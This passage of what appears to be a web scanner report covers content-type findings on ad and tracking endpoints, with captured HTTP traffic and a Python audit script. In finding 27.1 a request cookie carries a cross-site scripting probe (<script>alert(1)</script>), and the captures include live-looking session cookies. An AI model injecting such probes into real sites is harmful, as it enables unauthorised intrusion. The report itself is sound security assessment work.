Content-Type: application/x-javascript
Content-Length: 67
Last-Modified: Mon, 17 Jan 2011 19:57:15 GMT
Connection: close
Accept-Ranges: bytes

DISQUS.dtpl.actions.fire("realtime.update", "2010-12-08_19:48:43")

26.9. http://rt.legolas-media.com/lgrt

Summary

Severity:   Information
Confidence:   Firm
Host:   http://rt.legolas-media.com
Path:   /lgrt

Issue detail

The response contains the following Content-type statement: application/javascript. The response states that it contains script, and the five-byte body, true;, is a valid JavaScript statement, so the stated type is correct and the plain-text classification is a false positive.

Request

GET /lgrt?ci=2&ei=9&ti=28&pbi=37 HTTP/1.1
Host: rt.legolas-media.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ui=5ea31fa9-d42d-458f-9bb4-1700d69738c0; lgpr=//8=; lgdv12=1; lgdv6=1; lgdv95=1; lgdv73=1; lgtix=BgABADMBSQABADMBHAABADMBDAABADMB/QABADABXwABADMB

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:52:19 GMT
Server: Apache
Expires: -1
Cache-Control: no-cache; no-store
Content-Type: application/javascript
Set-Cookie: lgtix=BgABADMBSQABADMBHAADADMBDAABADMB/QABADABXwABADMB; path=/; expires=Wed, 03 Sep 2014 00:52:19 GMT; domain=.legolas-media.com
P3P: policyref="http://www.legolas-media.com/w3c/p3p.xml",CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Length: 5
Connection: close

true;

26.10. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies

Summary

Severity:   Information
Confidence:   Firm
Host:   http://snas.nbcuni.com
Path:   /snas/api/getRemoteDomainCookies

Issue detail

The response contains the following Content-type statement: text/html. The response states that it contains HTML. However, it actually contains script: a JSONP call, __nbcsnasadops.doSCallback({...}), not the CSS the scanner heuristics reported. The function name is copied from the callback parameter of the request, and the JSON argument echoes the JSESSIONID cookie value. A JSONP response served as text/html is exactly the case the issue background describes: a browser navigated directly to this URL renders the body as HTML, so the safety of the endpoint depends on the callback name being restricted to identifier characters, which this capture does not show either way.

Request

GET /snas/api/getRemoteDomainCookies?callback=__nbcsnasadops.doSCallback HTTP/1.1
Host: snas.nbcuni.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=C58B4400F3879E26517C8A2E3ECF06E2

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:53:25 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=10
Expires: Sun, 04 Sep 2011 00:53:35 GMT
Content-Length: 90
Content-Type: text/html

__nbcsnasadops.doSCallback({ "cookie":{"JSESSIONID":"C58B4400F3879E26517C8A2E3ECF06E2"}});

26.11. http://trc.taboolasyndication.com/reuters/trc/2/json

Summary

Severity:   Information
Confidence:   Firm
Host:   http://trc.taboolasyndication.com
Path:   /reuters/trc/2/json

Issue detail

The response contains the following Content-type statement: text/plain; charset=utf-8. The response states that it contains plain text. However, it actually contains script: a JSONP call, TRC.callbacks.recommendations_1({...}), not the CSS the scanner heuristics reported. The function name is copied from the cb parameter of the request.

Request

GET /reuters/trc/2/json?tim=19%3A48%3A52.780&publisher=reuters&pv=2&list-size=3&list-id=rbox-t2v&id=500&uim=article&intent=s&uip=article&external=http%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F03%2Fus-weather-football-idUSTRE78222D20110903&llvl=1&item-id=USTRE78222D20110904&item-type=text&item-url=http%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F04%2Fus-weather-football-idUSTRE78222D20110904&page-id=7ec1fa180194eff20c8fb72aa34c5e7764c06279&sd=v1_cf5b371b2ea2c82fafb75969374381dc_ae7f02b7-d8fc-4e74-9744-efca878a3ea7_1315097030_1315097030&uid=ae7f02b7-d8fc-4e74-9744-efca878a3ea7&cv=4-8-2-1-48560-3339640&uiv=default&cb=TRC.callbacks.recommendations_1 HTTP/1.1
Host: trc.taboolasyndication.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: taboola_session_id=v1_cf5b371b2ea2c82fafb75969374381dc_ae7f02b7-d8fc-4e74-9744-efca878a3ea7_1315097030_1315097030; taboola_wv=; taboola_user_id=ae7f02b7-d8fc-4e74-9744-efca878a3ea7; JSESSIONID=.prod2-f3

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Sun, 04 Sep 2011 01:01:03 GMT
Content-Type: text/plain; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: policyref="http://trc.taboolasyndication.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: taboola_session_id=v1_cf5b371b2ea2c82fafb75969374381dc_ae7f02b7-d8fc-4e74-9744-efca878a3ea7_1315097030_1315098063;Path=/reuters/
Set-Cookie: JSESSIONID=.prod2-f7;Path=/
Set-Cookie: taboola_wv=;Path=/reuters/;Expires=Mon, 03-Sep-12 01:01:03 GMT
Content-Length: 4005

TRC.callbacks.recommendations_1({"trc":{"req":"ebe18cbed15d8f4b449e571f68fc0689","session-id":"cf5b371b2ea2c82fafb75969374381dc","session-data":"v1_cf5b371b2ea2c82fafb75969374381dc_ae7f02b7-d8fc-4e74-
...[SNIP]...

26.12. http://view.atdmt.com/jaction/m0nssc_20HomePageConsumerBase_1

Summary

Severity:   Information
Confidence:   Firm
Host:   http://view.atdmt.com
Path:   /jaction/m0nssc_20HomePageConsumerBase_1

Issue detail

The response contains the following Content-type statement: text/html. The response states that it contains HTML. However, it actually contains script: the AT_tags() function definition shown below (the same response as in 25.21).

Request

GET /jaction/m0nssc_20HomePageConsumerBase_1 HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.sprint.com/index_c.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:47:34 GMT
Connection: close
Content-Length: 474

function AT_tags(){
try{var tags = new Array();
var imgs = new Array();
tags = ['http://spe.atdmt.com/images/pixel.gif','http://switch.atdmt.com/action','http://r.turn.com/r/beacon?b2=ItQ
...[SNIP]...

26.13. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The response contains the following Content-type statement: text/html; charset=utf-8. The response states that it contains HTML. However, it actually contains plain text: the error message Invalid Application ID, returned because the crawler sent the placeholder value your app id as the api_key and app_id parameters.

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df42349018%26origin%3Dhttp%253A%252F%252Fblogs.sacbee.com%252Ffe859d48%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df322bc3668%26origin%3Dhttp%253A%252F%252Fblogs.sacbee.com%252Ffe859d48%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2c039c9d%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfda0aaa7%26origin%3Dhttp%253A%252F%252Fblogs.sacbee.com%252Ffe859d48%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2c039c9d&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df37a882414%26origin%3Dhttp%253A%252F%252Fblogs.sacbee.com%252Ffe859d48%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2c039c9d&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df23cc7f5dc%26origin%3Dhttp%253A%252F%252Fblogs.sacbee.com%252Ffe859d48%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2c039c9d&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.159.52
X-Cnection: close
Date: Sun, 04 Sep 2011 00:48:38 GMT
Content-Length: 22

Invalid Application ID

26.14. http://www.reuters.com/assets/breakingNews

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.reuters.com
Path:   /assets/breakingNews

Issue detail

The response contains the following Content-type statement: text/html;charset=UTF-8. The response states that it contains HTML; the scanner classified the body as plain text. The visible part of the body consists of HTML conditional comments (<!--[if !IE]> ... <![endif]-->), which is consistent with the stated type, so the plain-text classification rests on the part of the response that is not shown here.

Request

GET /assets/breakingNews HTTP/1.1
Host: www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qseg=Q_D|Q_T; RE_USERID=9da0587b-a65b-4bca-a7de-c321e48d355a; _tr_ref.6e08dd17=1315097066.http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dnotre%2Bdame%2Bfootball%26date%3D2011-9-3%26sa%3DX; _tr_id.6e08dd17=88dc7998fd25ddac.1315097066.1.1315097066.1315097066; _tr_ses.6e08dd17=1315097065832; _tr_cv.6e08dd17=false; adops_master_kvs=xa%3Dn%3B; xa=xa%3Dn%3B; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1315115075506:ss=1315115075506; rsi_segs=I07714_10272|I07714_10273|I07714_10456; __utma=108768797.906251454.1315097076.1315097076.1315097076.1; __utmb=108768797.1.10.1315097076; __utmc=108768797; __utmz=108768797.1315097076.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football; tns=dataSource=cookie

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:47:49 GMT
Server: Apache
Expires: Sun, 4 Sep 2011 00:47:27 GMT
Host: betaus.reuters.com
Age: 20
Vary: Accept-Encoding
Content-Length: 387
Content-Type: text/html;charset=UTF-8

<!--[if !IE]> This has been served from cache <![endif]-->
<!--[if !IE]> Request served from apache server: S264630NJ2XSF02 <![endif]-->
<!--[if !IE]> Cached on Sun, 04 Sep 2011 00:47:29 GMT and will
...[SNIP]...

26.15. http://www.reuters.com/assets/info

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.reuters.com
Path:   /assets/info

Issue detail

The response contains the following Content-type statement: text/html;charset=UTF-8. The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /assets/info HTTP/1.1
Host: www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tns=dataSource=cookie; __qseg=Q_D|Q_T; RE_USERID=9da0587b-a65b-4bca-a7de-c321e48d355a; _tr_ref.6e08dd17=1315097066.http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dnotre%2Bdame%2Bfootball%26date%3D2011-9-3%26sa%3DX; _tr_id.6e08dd17=88dc7998fd25ddac.1315097066.1.1315097066.1315097066; _tr_ses.6e08dd17=1315097065832; _tr_cv.6e08dd17=false; adops_master_kvs=xa%3Dn%3B; xa=xa%3Dn%3B; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1315115075506:ss=1315115075506; rsi_segs=I07714_10272|I07714_10273|I07714_10456; __utma=108768797.906251454.1315097076.1315097076.1315097076.1; __utmb=108768797.1.10.1315097076; __utmc=108768797; __utmz=108768797.1315097076.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:47:48 GMT
Server: Apache
Expires: Sun, 4 Sep 2011 00:47:00 GMT
Age: 48
Vary: Accept-Encoding
Content-Length: 593
Content-Type: text/html;charset=UTF-8

<!--[if !IE]> This has been served from cache <![endif]-->
<!--[if !IE]> Request served from apache server: S264630NJ2XSF31 <![endif]-->
<!--[if !IE]> Cached on Sun, 04 Sep 2011 00:47:00 GMT and will
...[SNIP]...

26.16. http://www.reuters.com/assets/searchIntercept

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.reuters.com
Path:   /assets/searchIntercept

Issue detail

The response contains the following Content-type statement: text/html;charset=UTF-8. The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /assets/searchIntercept?blob= HTTP/1.1
Host: www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RE_USERID=9da0587b-a65b-4bca-a7de-c321e48d355a; _tr_ref.6e08dd17=1315097066.http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dnotre%2Bdame%2Bfootball%26date%3D2011-9-3%26sa%3DX; xa=xa%3Dn%3B; tns=dataSource=cookie; __qseg=Q_D|Q_T; adops_master_kvs=xa%3Dn%3B; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1315115328770:ss=1315115075506; _tr_id.6e08dd17=88dc7998fd25ddac.1315097066.1.1315097330.1315097066; _tr_ses.6e08dd17=1315097065832; _tr_cv.6e08dd17=false; snas_noinfo=1; __utma=108768797.906251454.1315097076.1315097076.1315097076.1; __utmb=108768797.2.10.1315097076; __utmc=108768797; __utmz=108768797.1315097076.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football; rsi_segs=I07714_10272|I07714_10273

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:03:06 GMT
Server: Apache
Expires: Sun, 4 Sep 2011 01:02:01 GMT
Age: 65
Vary: Accept-Encoding
Content-Length: 694
Content-Type: text/html;charset=UTF-8

<!--[if !IE]> This has been served from cache <![endif]-->
<!--[if !IE]> Request served from apache server: S264630NJ2XSF43 <![endif]-->
<!--[if !IE]> Cached on Sun, 04 Sep 2011 01:02:01 GMT and will
...[SNIP]...

26.17. https://www.sprint.net/performance/gen_line_xml.php

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.sprint.net
Path:   /performance/gen_line_xml.php

Issue detail

The response contains the following Content-type statement: text/html. The response states that it contains HTML. However, it actually appears to contain XML. The Referer in the request shows this data is fetched by performance.swf; the mismatch matters only if the URL is opened directly in a browser, which would parse the XML as HTML, and becomes exploitable only if user-controllable data is reflected into that document.

Request

GET /performance/gen_line_xml.php HTTP/1.1
Host: www.sprint.net
Connection: keep-alive
Referer: https://www.sprint.net/performance/performance.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1125

Response

HTTP/1.1 200 OK
Set-Cookie: ServerID=1124; path=/
Date: Sun, 04 Sep 2011 00:47:40 GMT
Server: Apache/2.2.4 (Unix)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 301119

<line>
   <start_x>982.22222222222</start_x>
   <start_y>205.31944444444</start_y>
   <end_x>984.10617777778</end_x>
   <end_y>212.28597238889</end_y>
   <ctrl_x>986.6642</ctrl_x>
   <ctrl_y>211.80270841667</ctrl
...[SNIP]...

26.18. https://www.sprint.net/performance/gen_pop_xml.php

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.sprint.net
Path:   /performance/gen_pop_xml.php

Issue detail

The response contains the following Content-type statement: text/html. The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /performance/gen_pop_xml.php HTTP/1.1
Host: www.sprint.net
Connection: keep-alive
Referer: https://www.sprint.net/performance/performance.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1125

Response

HTTP/1.1 200 OK
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 00:47:41 GMT
Server: Apache/2.2.4 (Unix)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 91549

<pop>
   <market_full>Nashville, TN</market_full>
   <market_short>nsh</market_short>
   <x>984.14638604058</x>
   <y>221.96406860352</y>
   <color>1</color>
   <region>na</region>
   <position>C</position>
   <probe
...[SNIP]...

27. Content type is not specified
There are 3 instances of this issue:

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body. For responses that are not meant to be rendered as documents (JSON, XML, plain text), also send X-Content-Type-Options: nosniff so that browsers honour the declared type instead of guessing from the body.
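
Both checks in this report, the "Content type incorrectly stated" findings in section 26 above and the "Content type is not specified" findings in this section, can be reproduced offline over captured responses. The following is an added example in Python, not code from the report or from the scanner that produced it: it parses raw HTTP responses, classifies the body with simple heuristics, compares the result with the declared Content-Type, and records whether X-Content-Type-Options: nosniff was sent. The sample responses are constructed to resemble the report's cases (their bodies are hypothetical, not the captured bytes), and the heuristics are simpler than the scanner's, so results can differ on edge cases such as bodies that consist only of HTML comments.

```python
# Added example: audit raw HTTP responses for a missing or mismatched Content-Type.
import json
import re
import xml.etree.ElementTree as ET
from dataclasses import dataclass
from typing import Dict, Optional, Tuple


@dataclass
class Finding:
    issue: Optional[str]     # "missing", "mismatch" or None
    declared: Optional[str]  # raw Content-Type header value, if any
    sniffed: str             # what the body looks like: html/xml/json/text/empty
    nosniff: bool            # X-Content-Type-Options: nosniff was sent


def parse_response(raw: str) -> Tuple[str, Dict[str, str], str]:
    """Split a raw HTTP/1.1 response into (status line, lower-cased headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


_HTML_TAG = re.compile(r"<(!doctype\s+html|html|head|body|script|div|p|a)\b", re.I)


def sniff_body(body: str) -> str:
    """Classify the body by what it actually contains, ignoring the headers."""
    s = body.lstrip()
    if not s:
        return "empty"
    if s[0] in "{[":
        try:
            json.loads(s)
            return "json"
        except ValueError:
            pass
    if s.startswith("<"):
        if s.lower().startswith("<?xml"):
            return "xml"
        if _HTML_TAG.search(s):
            return "html"
        try:
            ET.fromstring(s)   # well-formed with one root element: call it XML
            return "xml"
        except ET.ParseError:
            return "html"      # tag soup: a browser would render it as HTML
    return "text"


def declared_family(content_type: Optional[str]) -> Optional[str]:
    """Reduce a Content-Type value to the family names sniff_body() uses."""
    if content_type is None:
        return None
    mime = content_type.split(";", 1)[0].strip().lower()
    if mime in ("text/html", "application/xhtml+xml"):
        return "html"
    if mime == "application/json" or mime.endswith("+json"):
        return "json"
    if mime in ("text/xml", "application/xml") or mime.endswith("+xml"):
        return "xml"
    return "text" if mime.startswith("text/") else "other"


def audit(raw: str) -> Finding:
    """Apply the report's two checks ("not specified", "incorrectly stated") to one response."""
    _, headers, body = parse_response(raw)
    declared = headers.get("content-type")
    family = declared_family(declared)
    sniffed = sniff_body(body)
    nosniff = headers.get("x-content-type-options", "").lower() == "nosniff"
    if body and declared is None:
        issue = "missing"
    elif family in ("html", "xml", "json", "text") and sniffed not in ("empty", family):
        issue = "mismatch"
    else:
        issue = None
    return Finding(issue, declared, sniffed, nosniff)


# Constructed samples modelled on the report's findings; the bodies are hypothetical.
SAMPLES = {
    "xml served as text/html (cf. 26.17)":
        "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
        "<line><start_x>982.2</start_x><start_y>205.3</start_y></line>",
    "json with no Content-Type (cf. 27.3)":
        "HTTP/1.1 200 OK\r\nServer: nginx/0.7.62\r\n\r\n"
        '{"stat": "ok", "data": {"canopy": {"enabled": false}}}',
    "error page with no Content-Type (cf. 27.1)":
        "HTTP/1.1 503 Service Unavailable\r\nConnection: close\r\n\r\n"
        "<html><body><b>Http/1.1 Service Unavailable</b></body> </html>",
    "hardened json":
        "HTTP/1.1 200 OK\r\nContent-Type: application/json; charset=utf-8\r\n"
        "X-Content-Type-Options: nosniff\r\n\r\n"
        '{"stat": "ok"}',
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        f = audit(raw)
        print(f"{name}: issue={f.issue} declared={f.declared!r} sniffed={f.sniffed} nosniff={f.nosniff}")
```

Run it as a script to print one line per sample, or feed it responses saved from a proxy to triage a site's own findings. A missing or mismatched header is only a vulnerability if user-controllable data reaches the body; the nosniff flag tells you whether a browser would honour the declared type regardless of what the body looks like.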


27.1. http://rma-api.gravity.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rma-api.gravity.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: rma-api.gravity.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: vaguid=172d38ad2d9b9b5aa42030c637b398394a902<script>alert(1)</script>1bb5b69e467

Response

HTTP/1.1 503 Service Unavailable
Content-Length: 62
Pragma: no-cache
Cache-Control: no-cache, no-store
Date: Sun, 04 Sep 2011 01:07:45 GMT
Connection: close

<html><body><b>Http/1.1 Service Unavailable</b></body> </html>

27.2. http://www.meebo.com/cmd/btproviders

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.meebo.com
Path:   /cmd/btproviders

Request

POST /cmd/btproviders HTTP/1.1
Host: www.meebo.com
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_12_4&protocol=http%3A&network=sacbee%3Ablogs_sacbee
Content-Length: 0
Cache-Control: max-age=0
Origin: http://www.meebo.com
If-Modified-Since: Wed Dec 31 1969 18:00:00 GMT-0600 (Central Standard Time)
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meebo-cim-session=3235ab0cf3f08c41efd4; bcookie=24214e45185d42f41e74; tcookie=b6f4436ac614b0358d75%26false

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 04 Sep 2011 01:12:37 GMT
Connection: keep-alive
Content-Length: 432

[{"url": "http://tags.bluekai.com/site/4195?id={{tcookie}}&", "code": "bk", "sslUrl": "https://stags.bluekai.com/site/4195?id={{tcookie}}&", "interval": 2592000000}, {"url": "http://syndication.mmismm
...[SNIP]...

27.3. http://www.meebo.com/cmd/tc

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.meebo.com
Path:   /cmd/tc

Request

POST /cmd/tc HTTP/1.1
Host: www.meebo.com
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_12_4&protocol=http%3A&network=sacbee%3Ablogs_sacbee
Content-Length: 107
Cache-Control: max-age=0
Origin: http://www.meebo.com
If-Modified-Since: Wed Dec 31 1969 18:00:00 GMT-0600 (Central Standard Time)
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meebo-cim-session=3235ab0cf3f08c41efd4; bcookie=24214e45185d42f41e74; tcookie=b6f4436ac614b0358d75%26false

canopy=true&tc=true&bcookie=24214e45185d42f41e74&tcookie=b6f4436ac614b0358d75&partner=sacbee%3Ablogs_sacbee

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 04 Sep 2011 01:12:38 GMT
Connection: keep-alive
Content-Length: 107

{"stat": "ok", "data": {"tcookie": "b6f4436ac614b0358d75", "canopy": {"enabled": false}, "categories": {}}}
